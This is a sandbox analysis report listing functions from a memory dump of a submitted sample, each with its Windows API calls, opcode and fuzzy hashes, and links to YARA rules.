Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 32ef9f44b6b91649013aab4d2fad6edcce34460c9bca9816379aab3d9f361dd0
Instruction ID: b9e875de42edd9355f4906d5bcc58e0e89c80e8a0793fe0e4b586eb1c39f35ff
Opcode Fuzzy Hash: 32ef9f44b6b91649013aab4d2fad6edcce34460c9bca9816379aab3d9f361dd0
Instruction Fuzzy Hash: 6721E1B1111748AEE7308F64C889FA7B7F8FB49768F004A6DF5E5D2191C774EC888A61

Function 008C9D62 Relevance: 3.1, APIs: 2, Instructions: 82timeCOMMON

Download Yara Rule

APIs

FlushFileBuffers.KERNEL32(?,?,?,?,?,?,008C7547,?,?,?,?), ref: 008C9D7C
SetFileTime.KERNELBASE(?,?,?,?), ref: 008C9E2C

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: File$BuffersFlushTime
String ID:
API String ID: 1392018926-0
Opcode ID: 5511f93d34af04561e16ab76fa41296674b2626ffb664771eb96d6dc1c961f49
Instruction ID: 6844636b24c6becbb7731f94c56d4011678497e9403779201140f78b59afa15a
Opcode Fuzzy Hash: 5511f93d34af04561e16ab76fa41296674b2626ffb664771eb96d6dc1c961f49
Instruction Fuzzy Hash: 29219131148246ABC714DE24C455FAABBF4FB95704F04099DF5C2D7541D739DA0CDBA1

Function 008EA458 Relevance: 3.1, APIs: 2, Instructions: 65libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,008F3958), ref: 008EA4B8
__crt_fast_encode_pointer.LIBVCRUNTIME ref: 008EA4C5

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: AddressProc__crt_fast_encode_pointer
String ID:
API String ID: 2279764990-0
Opcode ID: 6d162f49217ab25bcc93d9127242b4b5f53d86cf858fc9b120417f11eadf47d0
Instruction ID: 8e2a69d3dc7878ea9b0e26f0be17fac0f0266dad891f7fd32ff6f60c60afc921
Opcode Fuzzy Hash: 6d162f49217ab25bcc93d9127242b4b5f53d86cf858fc9b120417f11eadf47d0
Instruction Fuzzy Hash: 27113D336101685B9B399E3EEC44C6A7391FB82B287164110FD15EF294EA74FC41C7D6

Function 008C9B59 Relevance: 3.1, APIs: 2, Instructions: 57COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(?,?,?,?,-00001964,?,00000800,-00001964,008C9B35,?,?,00000000,?,?,008C8D9C,?), ref: 008C9BC0
GetLastError.KERNEL32 ref: 008C9BCD

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 7f0ca1261f31c09d0a2cb42c1fb0e10dda78f8bfd860ed7dae4600a0675a03e2
Instruction ID: 4db67600fddd26794ecc3ac61862907a2cca881109c9f42111870be5aefd9226
Opcode Fuzzy Hash: 7f0ca1261f31c09d0a2cb42c1fb0e10dda78f8bfd860ed7dae4600a0675a03e2
Instruction Fuzzy Hash: 1201A532204229AB8B08CE65AC98E7AB379FFC5731B14856DE996C7290DA31DC059621

Function 008C9E40 Relevance: 3.1, APIs: 2, Instructions: 54COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(?,00000000,00000000,00000001), ref: 008C9E76
GetLastError.KERNEL32 ref: 008C9E82

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 35b1fa304cdeb329f77cb67275f0fde1c99e60ce88eb012d1d9238e1abb19514
Instruction ID: 69bc88ce4aa668882fb6d3c877fac1558ab99323d05b68e553102589080867b8
Opcode Fuzzy Hash: 35b1fa304cdeb329f77cb67275f0fde1c99e60ce88eb012d1d9238e1abb19514
Instruction Fuzzy Hash: 8B019E717042045BEB34DE69DC48F6BB6E9FB98329F14897EF186C2680DEB1EC488611

Function 008E8606 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 008E8627

Part of subcall function 008E8518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,008EC13D,00000000,?,008E67E2,?,00000008,?,008E89AD,?,?,?), ref: 008E854A

HeapReAlloc.KERNEL32(00000000,?,?,?,?,00900F50,008CCE57,?,?,?,?,?,?), ref: 008E8663

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: Heap$AllocAllocate_free
String ID:
API String ID: 2447670028-0
Opcode ID: f8aef66722f36eeccedbad05c155a8eeaa4c08c417617d7ec06e2550fda20e43
Instruction ID: 51b5c0ec56a27147a8fb2a597373f24aa0e9ebbbe6f5230e5478f5b06048f931
Opcode Fuzzy Hash: f8aef66722f36eeccedbad05c155a8eeaa4c08c417617d7ec06e2550fda20e43
Instruction Fuzzy Hash: 37F04F21105599EADB212B6BAC08E6F2769FBF37A4B244115F81CD61A1DF20C80195A6

Function 008D0908 Relevance: 3.0, APIs: 2, Instructions: 33COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?), ref: 008D0915
GetProcessAffinityMask.KERNEL32(00000000), ref: 008D091C

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: Process$AffinityCurrentMask
String ID:
API String ID: 1231390398-0
Opcode ID: 384add6dbaf33c8685cf93bdea82960abeb45d1cd05f6970789a1bffa23ba36a
Instruction ID: 8eb622f684221e0af33692c089a88ee9c460e88c569974e5acb8efe888c9190c
Opcode Fuzzy Hash: 384add6dbaf33c8685cf93bdea82960abeb45d1cd05f6970789a1bffa23ba36a
Instruction Fuzzy Hash: 00E09272A10109BB6F09CAB49C14ABF7B9DFB44214B20427BA806D7301F930DE018EA4

Function 008CA444 Relevance: 3.0, APIs: 2, Instructions: 30COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,008CA27A,?,?,?,008CA113,?,00000001,00000000,?,?), ref: 008CA458
SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,008CA27A,?,?,?,008CA113,?,00000001,00000000,?,?), ref: 008CA489

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 8cec7fe1ece717388112f96774f72d859a275933c09c60e563112841f8742d8e
Instruction ID: 94bf00b143ddeb532a12cd86be357ee579fb3af126ee907a36168a9cd392ead1
Opcode Fuzzy Hash: 8cec7fe1ece717388112f96774f72d859a275933c09c60e563112841f8742d8e
Instruction Fuzzy Hash: 11F0303124020D7BDF116F74DC45FE9776CFB04385F448056BC88E6261DB76DAA8EA51

Function 008DD573 Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 008DD5A1
SetDlgItemTextW.USER32(00000065,?), ref: 008DD5B8

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: ItemText_swprintf
String ID:
API String ID: 3011073432-0
Opcode ID: 4f57638f21d10273895ebc102ba1c592650a5e737af52d32f59274ec4550f4cd
Instruction ID: 8a213d14dad55f7fc86fd11652084a63692e740fdc02304bc826e6e4c577e5ac
Opcode Fuzzy Hash: 4f57638f21d10273895ebc102ba1c592650a5e737af52d32f59274ec4550f4cd
Instruction Fuzzy Hash: 9DF027315143487ADB11AB649C02FAA3728F704345F000657B600D31B2D9316A609662

Function 008CA12D Relevance: 3.0, APIs: 2, Instructions: 28fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(?,?,?,008C984C,?,?,008C9688,?,?,?,?,008F1FA1,000000FF), ref: 008CA13E
DeleteFileW.KERNEL32(?,?,?,00000800,?,?,008C984C,?,?,008C9688,?,?,?,?,008F1FA1,000000FF), ref: 008CA16C

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 283b190bc16a4c8fbaa29f701244a43e5ed14de3c89609d85714b595d5e374ef
Instruction ID: 8efed0d6c50c156db9d5f25083e4b7b3b49d9eaa6c1cf39be3b4fcb4ce6a8f24
Opcode Fuzzy Hash: 283b190bc16a4c8fbaa29f701244a43e5ed14de3c89609d85714b595d5e374ef
Instruction Fuzzy Hash: A1E06D3564020C6ADB11AE74DC41FE9776CFB08381F48406AB888D7160DB71DD94EAA1

Function 008DA39D Relevance: 3.0, APIs: 2, Instructions: 27COMMON

Download Yara Rule

APIs

GdiplusShutdown.GDIPLUS(?,?,?,?,008F1FA1,000000FF), ref: 008DA3D1
CoUninitialize.COMBASE(?,?,?,?,008F1FA1,000000FF), ref: 008DA3D6

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: GdiplusShutdownUninitialize
String ID:
API String ID: 3856339756-0
Opcode ID: e95baa099b4cfc1c16a2c6946df999bbc4a83388c7130fdd5d3d0762662327ec
Instruction ID: c494a44cc52614a8c54b84eefd9327513d1f34dbda2c1cb59a43f4f508094bf0
Opcode Fuzzy Hash: e95baa099b4cfc1c16a2c6946df999bbc4a83388c7130fdd5d3d0762662327ec
Instruction Fuzzy Hash: F2F03032618654EFC7109B5CDC05B15FBA8FB49B20F04436AF419C3760CB746811CA91

Function 008CA194 Relevance: 3.0, APIs: 2, Instructions: 26COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,?,?,008CA189,?,008C76B2,?,?,?,?), ref: 008CA1A5
GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,008CA189,?,008C76B2,?,?,?,?), ref: 008CA1D1

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 1b4a45b9b3ec0246f660d0b742a0f63b3a582bcf67a64dfaa0eac4f5701f077f
Instruction ID: 4c19dfed751cd7a69037031b42219e587f29cc19ea33948555cf7b4a9b4baeba
Opcode Fuzzy Hash: 1b4a45b9b3ec0246f660d0b742a0f63b3a582bcf67a64dfaa0eac4f5701f077f
Instruction Fuzzy Hash: 62E06D369005286BCB21AAA8DC05FE9B768FB083A1F0442A6BD45E3290DA70DD449AE1

Function 008D0085 Relevance: 3.0, APIs: 2, Instructions: 25libraryCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?,00000800), ref: 008D00A0
LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,008CEB86,Crypt32.dll,00000000,008CEC0A,?,?,008CEBEC,?,?,?), ref: 008D00C2

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: DirectoryLibraryLoadSystem
String ID:
API String ID: 1175261203-0
Opcode ID: d11fb97a98d0746965bec1d8e7169f166538a61a777a80070516eaa774fe426d
Instruction ID: dc69f514f5133d909ee69012587232953fbba759877334e811756dc28b665dee
Opcode Fuzzy Hash: d11fb97a98d0746965bec1d8e7169f166538a61a777a80070516eaa774fe426d
Instruction Fuzzy Hash: D9E0127690151C6ADB21AAA4DC05FE6776CFF09382F0400A6B948D3104DA74DA44CBA5

Function 008D9B0F Relevance: 3.0, APIs: 2, Instructions: 24windowCOMMON

Download Yara Rule

APIs

GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 008D9B30
GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 008D9B37

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: BitmapCreateFromGdipStream
String ID:
API String ID: 1918208029-0
Opcode ID: c646b844a856455d936a4cf2ee64e7bfa80697652c9d1f80384e28af20d5760e
Instruction ID: 0ea76f8e88dc60bce00441e7216dc9ad5378d6c9a9a9c0aa6952a840c8d60116
Opcode Fuzzy Hash: c646b844a856455d936a4cf2ee64e7bfa80697652c9d1f80384e28af20d5760e
Instruction Fuzzy Hash: AAE0ED71901218EBDB10EF98D5016AEB7F8FB04321F20815FF899D7300D6716E049B91

Function 008E215C Relevance: 3.0, APIs: 2, Instructions: 19COMMON

Download Yara Rule

APIs

Part of subcall function 008E329A: try_get_function.LIBVCRUNTIME ref: 008E32AF

___vcrt_FlsSetValue.LIBVCRUNTIME ref: 008E217A
___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 008E2185

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
String ID:
API String ID: 806969131-0
Opcode ID: 3354859a830acfc0d4990b4ad7504d4eb619805f49445be8094b1deb320bd8dd
Instruction ID: b7a6da4a87cd5213e84021128727d1f430036f912de7c8cb5566645f71ef0b5d
Opcode Fuzzy Hash: 3354859a830acfc0d4990b4ad7504d4eb619805f49445be8094b1deb320bd8dd
Instruction Fuzzy Hash: 92D0A7341443C524290826BB38464A8334CF863B743F00645E720C61D1EE14A700A112

Function 008DDC67 Relevance: 3.0, APIs: 2, Instructions: 13COMMONLIBRARYCODE

Download Yara Rule

APIs

DloadLock.DELAYIMP ref: 008DDC73
DloadProtectSection.DELAYIMP ref: 008DDC8F

Part of subcall function 008DDE67: DloadObtainSection.DELAYIMP ref: 008DDE77

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: Dload$Section$LockObtainProtect
String ID:
API String ID: 731663317-0
Opcode ID: a7ecdfed8b052d472a671d236445bf4a505671756ccb0014a04e1c4a8448cbfd
Instruction ID: 6ec62706b62f2e62da8b9a19cf65c7966a56476d1937cec28886290e5205a41d
Opcode Fuzzy Hash: a7ecdfed8b052d472a671d236445bf4a505671756ccb0014a04e1c4a8448cbfd
Instruction Fuzzy Hash: A0D012B01143108BC621EB28B946B2C3B74F788759F640703F585C73A6DFF44485D606

Function 008C12E6 Relevance: 3.0, APIs: 2, Instructions: 11COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 008C12FB
ShowWindow.USER32(00000000), ref: 008C1302

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: ItemShowWindow
String ID:
API String ID: 3351165006-0
Opcode ID: 20f5c2bd13adc2e5593f9c379c14dcd0dd90e7bc3079c6cf054517462441d3a2
Instruction ID: 81cedd8722db4e2830533e9d53825c31d7a5575dc02466d4cecedc11669d432c
Opcode Fuzzy Hash: 20f5c2bd13adc2e5593f9c379c14dcd0dd90e7bc3079c6cf054517462441d3a2
Instruction Fuzzy Hash: 36C0123206C200BECB010BB0DC09D3FBBA8ABA4212F05C928B2A5C0061C238C020EB11

Function 008C19A6 Relevance: 1.8, APIs: 1, Instructions: 310COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 008C19AB

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 914b79a2b2cdd0ff90aa02b431d9bc71a3e9f04e48b4f8321c387b73cf9db6d9
Instruction ID: c26b20752ef8998476e0ea90cfb2f36d98d35a488762d59546093770e3426bd6
Opcode Fuzzy Hash: 914b79a2b2cdd0ff90aa02b431d9bc71a3e9f04e48b4f8321c387b73cf9db6d9
Instruction Fuzzy Hash: F7C16970A042549FEF159F6888C8FA97BB5FF0A314F1840AEE846DB287DB31D954CB61

Function 008C3B3D Relevance: 1.7, APIs: 1, Instructions: 176COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 008C3B42

Memory Dump Source

